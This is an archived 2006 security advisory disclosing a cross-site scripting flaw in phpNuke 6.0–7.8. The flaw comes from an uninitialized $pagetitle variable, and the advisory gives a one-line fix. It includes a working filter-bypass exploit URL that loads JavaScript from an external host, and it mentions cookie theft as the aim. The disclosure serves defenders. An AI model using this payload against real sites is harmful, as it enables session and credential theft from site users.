what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

waraxe-2006-SA-044.txt

waraxe-2006-SA-044.txt
Posted Feb 14, 2006
Authored by Janek Vind aka waraxe | Site waraxe.us

waraxe-2006-SA#044 - XSS in phpNuke version 7.8 and older.

tags | exploit
SHA-256 | ce82cf015db258e8ead19ce271052cd72aebd9aa649c6173ec1c5bfb830a570d

waraxe-2006-SA-044.txt

Change Mirror Download


{================================================================================}
{ [waraxe-2006-SA#044] }
{================================================================================}
{ }
{ [ XSS in phpNuke 7.8 and older versions] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 13. February 2006
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-44.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

phpNuke 6.0 - 7.8

Homepage: http://phpnuke.org/


What is phpNuke ?

PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet.
The Administrator has total control of his web site, registered users, and he will have in
the hand a powerful assembly of tools to maintain an active and 100% interactive web site
using databases.


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Potentially harmful cross-site scripting bug has been found in phpNuke software.
All versions from 6.0 to 7.8 are affected. Version 7.9 has not been tested against this bug,
but probably it is affected too. As in case of any XSS bugs, there can be many ways to
exploit this bug, for example stealing the cookies, containing username/hashed password.


Details
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So what is the cause of this XSS case? As common in phpNuke world, problem lies in
uninitialized variable - "$pagetitle". This global variable is used for transfer page
title from module worker-code to "head()" function in "header.php" file.

Looking at source ("header.php" line ~ 28):

----------------[ from source code ]------------------

function head() {
global $slogan, $sitename, $banners, $nukeurl, $Version_Num, $artpage, $topic,
$hlpfile, $user, $hr, $theme, $cookie, $bgcolor1, $bgcolor2, $bgcolor3, $bgcolor4,
$textcolor1, $textcolor2, $forumpage, $adminpage, $userpage, $pagetitle;
include("includes/ipban.php");
$ThemeSel = get_theme();
include("themes/$ThemeSel/theme.php");
echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n";
echo "<html>\n";
echo "<head>\n";
echo "<title>$sitename $pagetitle</title>\n";
include("includes/meta.php");
include("includes/javascript.php");
----------------[ /from source code ]-----------------

So we see, that "$pagetitle" is directly rendered to html code. And after searching in
source code, we can see that it is not initialized by default.
Hmm, what about running some tests ...


Let's try "http://localhost/nuke78/?pagetitle=w00t></title></head><body>test"


and we see, that html tags injection is really possible.
Now comes the hard part - how to inject scripting code? Phpnuke is using some anti-XSS
filters agaist injection, so direct attack with "<script>" and other usual tags will not
succeed. Well, as always, there can be found ways to bypass filters and after playing some
time with various injection tricki, I found this possibility:

[------ real life exploit ------]

http://localhost/nuke78/?pagetitle=kala</title></head><script+src=http://www.waraxe.us/~kama/p0hh.js?

[----- /real life exploit ------]


This method was tested successfully with 3 browsers - IE 6, Firefox 1.5.0.1 and Opera 8.51 .
So it seems, that phpnuke anti-xss filter must be made to be more bulletproof ...

Bye all and have a nice day ;)



How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Write one code line to "mainfile.php":

$pagetitle = '';

This will initialize affected variable and patch the hole.


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz to LINUX, Heintz, y3dips, shai-tan, slimjim100, zer0-c00l and
all other active members from waraxe forum !

Raido Kerna - tervitused!


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DX expeditions database - http://www.dxdb.com/

HDD data recovery - http://www.hdd911.com/


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close